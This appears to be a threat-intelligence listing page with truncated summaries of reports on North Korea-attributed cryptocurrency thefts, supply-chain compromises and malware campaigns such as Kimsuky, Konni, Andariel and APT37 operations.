627 reports
CertiK reports that the Heco Bridge and HTX hot-wallet compromise caused about $113.3 million in suspicious losses across Ethereum, TRON, and possibly Bitcoin. The bridge loss followed compromise of the Heco Bridge operator wallet, allowing withdrawToken …
A November 2023 archived X post attributed a cluster of cryptocurrency thefts to North Korean state sponsored hackers also known as Lazarus Group, listing HTX/HECO, Poloniex, CoinEx, Stake, Alphapo/CoinsPaid, and Atomic Wallet. The post put losses at abou…
For software supply chain attacks, DPRK state-linked cyber actors have used zero-day exploits and newly published vulnerabilities and tools, as well as exploited multiple vulnerabilities in series, to precisely attack a specific target. See the IoC sectio…
REKT reported that HECO Bridge and HTX lost about $99 million in back-to-back attacks on Sun-linked crypto platforms, with $86.6 million drained from the HECO Ethereum bridge and $12.5 million from HTX hot wallets. The attack narrative identifies a compro…
Microsoft attributes a CyberLink supply-chain compromise to Diamond Sleet, a North Korea-based actor also tracked as ZINC, Temp.Hermit, or Labyrinth Chollima. The malicious file was a legitimate CyberLink installer signed with a valid CyberLink certificat…
The first campaign's objective is likely cryptocurrency theft and using compromised targets as a staging environment for additional attacks. Our investigation revealed two new malware families, and tactics used in this campaign align with previously repor…
South Korean police warned that a North Korean hacking organization continued sending impersonation emails posing as government agencies, journalists, and research institutes. The group used malicious attachments to install malware on PCs and phishing URL…
ASEC reported Kimsuky distributing a malicious JSE dropper disguised as an import declaration to South Korean research institutes. The dropper contains obfuscated PowerShell, a Base64-encoded backdoor, and a benign PDF with target information, then writes…
FortiGuard described an ongoing Konni campaign using a Russian-language Word document with malicious macros. When the victim enables content, VBA extracts embedded ZIP contents, runs hidden batch scripts, deploys UPX-packed DLLs, and uses a wusa.exe UAC b…
South Korea's Seoul Central District Prosecutors' Office charged two data-recovery business operators accused of colluding with hackers who deployed Magniber ransomware. Prosecutors said the hackers encrypted victims' files and shared ransomware timing an…
There have also been circumstances of the Andariel group having exploited other vulnerabilities in the attack process to distribute malware. The Andariel group is one of the threat groups that are highly active in South Korea, alongside the Kimsuky and La…
The source attributes a November 2023 billing themed HTML and LNK malware chain to APT37, also known as Reaper, Group123, RedEyes, ScarCruft, or Ricochet Chollima. The lure is distributed as a ZIP containing an HWP decoy and a malicious LNK that launches …
A compromised Uno Re deployer private key let an attacker transfer contract ownership, alter the claims assessor role, and drain SSIP, SSRP, and Rewarder contracts. Uno Re reported losses of 32.4 million UNO, 127.9 thousand USDC, 59.3 thousand USDT, and 1…
ASEC assessed that Andariel may have abused the Apache ActiveMQ remote code execution flaw CVE-2023-46604 to install NukeSped and TigerRat backdoors on exposed servers. The evidence is circumstantial: the affected system was repeatedly hit after public di…
CertiK describes the November 2023 Poloniex compromise as a private-key incident affecting Ethereum, Tron, and Bitcoin wallets, with losses estimated at about $132 million. The stolen assets moved through at least 681 wallets, including large ERC-20 swaps…